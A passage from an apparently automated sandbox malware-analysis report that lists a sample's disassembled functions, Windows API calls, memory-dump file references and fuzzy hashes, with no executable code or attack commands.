                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$CreateInitializeInstance
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2531819542-0
                                                                                                                                              • Opcode ID: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                                              • Instruction ID: d74481e86e668fc06052e60e2a5e486a87dd0838d2a97d2aabe5d75d40d84abb
                                                                                                                                              • Opcode Fuzzy Hash: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                                              • Instruction Fuzzy Hash: FC3119B5204341AFD724CFA0C888E6BB7A9FFC9700F14896DF9459B291D635EC44CB65
                                                                                                                                              Function 00414F30 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414FA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$Close$FileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3046750681-0
                                                                                                                                              • Opcode ID: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                                              • Instruction ID: c85bec187cc915339fe74b88054a561c9c391bf97f991d5b0ad1c1012243f531
                                                                                                                                              • Opcode Fuzzy Hash: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                                              • Instruction Fuzzy Hash: CF219070205201CBD7258F15C854BEBB7E9AFC6325F14866DE4098B3A0D339D843CB95
                                                                                                                                              Function 004013D0 Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LoadResource.KERNEL32(?,?), ref: 004013DC
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004013EB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$LoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1037334470-0
                                                                                                                                              • Opcode ID: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                                              • Instruction ID: 4ddbe79ddf29716ed0e0787d15bd08c75ff9431ae36c8441fcffb4845dcff88c
                                                                                                                                              • Opcode Fuzzy Hash: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                                              • Instruction Fuzzy Hash: 62F0C83770026147CB305F69EC448ABB7D8EAD27A7705083FFD91E3261D238D84496A8
                                                                                                                                              Function 00422895 Relevance: 4.5, APIs: 3, Instructions: 37threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 004228A6
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 004228B8
                                                                                                                                              • GetACP.KERNEL32 ref: 004228E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4232894706-0
                                                                                                                                              • Opcode ID: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                                              • Instruction ID: 479ae5959c9c7c33de479cf2c97852b65f57573494026bee3456946d9841ba59
                                                                                                                                              • Opcode Fuzzy Hash: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                                              • Instruction Fuzzy Hash: 1EF0AF31E00234ABC715EBA0E8145EF77A4BB06B41B5142A9E95297250D7B4AE09C799
                                                                                                                                              Function 00422CCA Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                                              • Instruction ID: a4ee6ba57dd3c2eee595af29f84efc58c9f0a8231bf26c2dab4fe45ac8b8fa99
                                                                                                                                              • Opcode Fuzzy Hash: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                                              • Instruction Fuzzy Hash: A7F03131310119BBCF059F61EE049AE7B6CAB01344B848426FD16D5121DBBCCA15DB5E
                                                                                                                                              Function 00413800 Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(0040B718,?), ref: 00413813
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00413828
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                                              • Instruction ID: 4b0baa7c04ff5837cf594f603c76cd3553f5a9d2e9049aea6c7cfb4a64392fa4
                                                                                                                                              • Opcode Fuzzy Hash: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                                              • Instruction Fuzzy Hash: D6E0C2B94442402BC200EF35D948AEB77D95B52722F049A1AFCA8822E0D23D984DDA2A
                                                                                                                                              Function 00414340 Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414353
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414368
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                                              • Instruction ID: d18f64121f5c3201ee76a233fb6b76ca38dcc0ed17e5b9cd94885203bfb14983
                                                                                                                                              • Opcode Fuzzy Hash: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                                              • Instruction Fuzzy Hash: 51E0C2B51442442BC2058F34D948AEB77996B82721F048A1ABCB8822E0E23D884DDA3A
                                                                                                                                              Function 0043063C Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnumSystemLocalesA.KERNEL32(00430320,00000001,00000000,?), ref: 004306A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                              • Opcode ID: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                                              • Instruction ID: 54d17df95efd4fea5ab28ce8627b56d0c3c169f5056bfa7745a835ac7e03007b
                                                                                                                                              • Opcode Fuzzy Hash: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                                              • Instruction Fuzzy Hash: 41F03C715713019EDBD0DFB8ED2A7693BE1EB85304F506A3EE841822A5C778649E8B0C
                                                                                                                                              Function 00432551 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006), ref: 00432571
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
